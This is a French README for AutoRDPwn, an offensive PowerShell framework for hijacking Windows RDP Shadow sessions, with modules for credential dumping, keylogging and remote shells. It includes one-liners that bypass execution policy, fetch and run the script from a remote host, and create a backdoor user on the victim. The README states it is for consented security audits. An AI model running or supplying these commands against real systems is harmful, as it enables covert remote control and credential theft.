
The Shadow Attack Framework

AutoRDPwn est un framework de post-exploitation créé en Powershell, conçu principalement pour automatiser l'attaque Shadow sur les ordinateurs Microsoft Windows. Cette vulnérabilité (listée comme une fonctionnalité par Microsoft) permet à un attaquant distant de visualiser le bureau de sa victime sans son consentement, et même de le contrôler à la demande, en utilisant des outils natifs du système d'exploitation lui-même.
Grâce aux modules supplémentaires, il est possible d'obtenir un shell distant via Netcat, de dumper les hashes du système avec Mimikatz, de charger un keylogger distant et bien plus encore. Le tout, via un menu totalement intuitif en sept langues différentes.
De plus, il est possible de l'utiliser dans un shell inversé via une série de paramètres décrits dans la section d'utilisation.
Powershell 4.0 ou supérieur
• De nombreux bugs corrigés
• Améliorations esthétiques et temps d'attente améliorés
• Connexion Proxy-Aware via les paramètres système
• Il est désormais possible d'utiliser l'outil hors ligne en téléchargeant le fichier .zip
• Détection automatique de la langue en appuyant sur la touche Entrée
• Invoke-DCOM a été remplacé par SharpRDP
• PowerUp a été remplacé par Invoke-PrivescCheck
• Création de la sous-routine de nettoyage automatique chez la victime
• Nouveau module disponible : SMB Shell chiffré avec AES
• Nouveau module disponible : Changer d'utilisateur avec RunAs
*Le reste des changements peut être consulté dans le fichier CHANGELOG
Cette application peut être utilisée localement, à distance ou pour pivoter entre machines.
Lorsqu'elle est utilisée à distance dans un shell inversé, il est nécessaire d'utiliser les paramètres suivants :
Exécution locale en une ligne :
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Exemple d'exécution distante en une ligne :
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
https://darkbyte.net/autordpwn-la-guia-definitiva

Ce projet est sous licence GNU 3.0 - voir le fichier LICENSE pour plus de détails.
Ce framework a été créé et conçu de A à Z par Joel Gámez Molina // @JoelGMSec
Certains modules utilisent du code, des scripts et des outils tiers, notamment :
• Chachi-Enumerator par Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m par Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp par Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang
• Invoke-TheHash par Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz par Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz
• PsExec par Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper par Stas'M Corp. --> https://github.com/stascorp/rdpwrap
• SharpRDP par Steven F --> https://github.com/0xthirteen/SharpRDP
Et bien d'autres, qui ne tiennent pas ici.. Merci à tous pour leur excellent travail.
Ce logiciel n'offre aucune garantie. Son utilisation est exclusive aux environnements éducatifs et/ou aux audits de sécurité avec le consentement correspondant du client. Je ne suis pas responsable de son utilisation abusive ni des éventuels dommages causés par celui-ci.
Pour plus d'informations, vous pouvez me trouver sur Twitter sous @JoelGMSec et sur mon blog darkbyte.net.
Vous pouvez soutenir mon travail en m'offrant un café :
| Paramètre | Description |
|---|
| -admin / -noadmin | Selon les permissions dont nous disposons, nous utiliserons l'un ou l'autre |
| -nogui | Cela évitera de charger le menu et certaines couleurs, garantissant sa fonctionnalité |
| -lang | Nous choisirons notre langue (Anglais, Espagnol, Français, Allemand, Italien, Russe ou Portugais) |
| -option | Comme avec le menu, nous pouvons choisir comment lancer l'attaque |
| -shadow | Nous déciderons si nous voulons voir ou contrôler l'appareil distant |
| -createuser | Ce paramètre est optionnel, l'utilisateur AutoRDPwn:AutoRDPwn sera créé sur la machine victime |
| -noclean | Désactive le processus d'annulation de toutes les modifications sur l'ordinateur victime |